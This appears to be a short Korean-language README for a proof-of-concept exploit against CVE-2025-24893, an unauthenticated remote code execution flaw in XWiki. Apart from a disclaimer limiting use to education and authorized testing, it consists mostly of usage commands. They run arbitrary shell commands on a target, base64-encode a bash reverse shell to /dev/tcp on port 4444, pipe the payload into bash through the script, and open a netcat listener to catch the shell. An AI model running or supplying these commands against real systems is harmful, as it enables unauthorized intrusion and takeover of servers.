
CVE-2025-24893을 위한 개념 증명 익스플로잇으로, XWiki에서 인증되지 않은 원격 코드 실행을 가능하게 하며, Python을 통해 임의의 셸 명령과 리버스 셸 인젝션을 수행합니다.
CVE-2025-24893에 대한 업데이트된 개념 증명(PoC) 익스플로잇입니다. XWiki의 인증되지 않은 치명적인 RCE 취약점입니다. 이 버전은 임의의 셸 명령 실행과 깔끔한 리버스 셸 주입을 가능하게 하여 원본을 개선했습니다.
작성자: HexHunter404
이 코드는 교육 및 허가된 침투 테스트 목적으로만 제공됩니다.
소유하지 않거나 명시적인 테스트 권한이 없는 시스템에서는 사용하지 마십시오.
bash -c '<command>'를 통한 명령 실행 지원/xwiki 경로 유지 및 리디렉션 루프 방지python3 CVE-2025-24893-PoC.py -u http://<target>/xwiki -c "<command>"
. Base64로 리버스 셸 인코딩
echo "bash -i >& /dev/tcp/[IP]/4444 0>&1" | base64
. PoC를 사용하여 전송
python3 CVE-2025-24893-PoC.py -u [URL] -c "echo [Base64 Payload] | base64 -d | bash"
. 리스너 설정
nc -lvnp 4444
성공하면 셸을 획득합니다.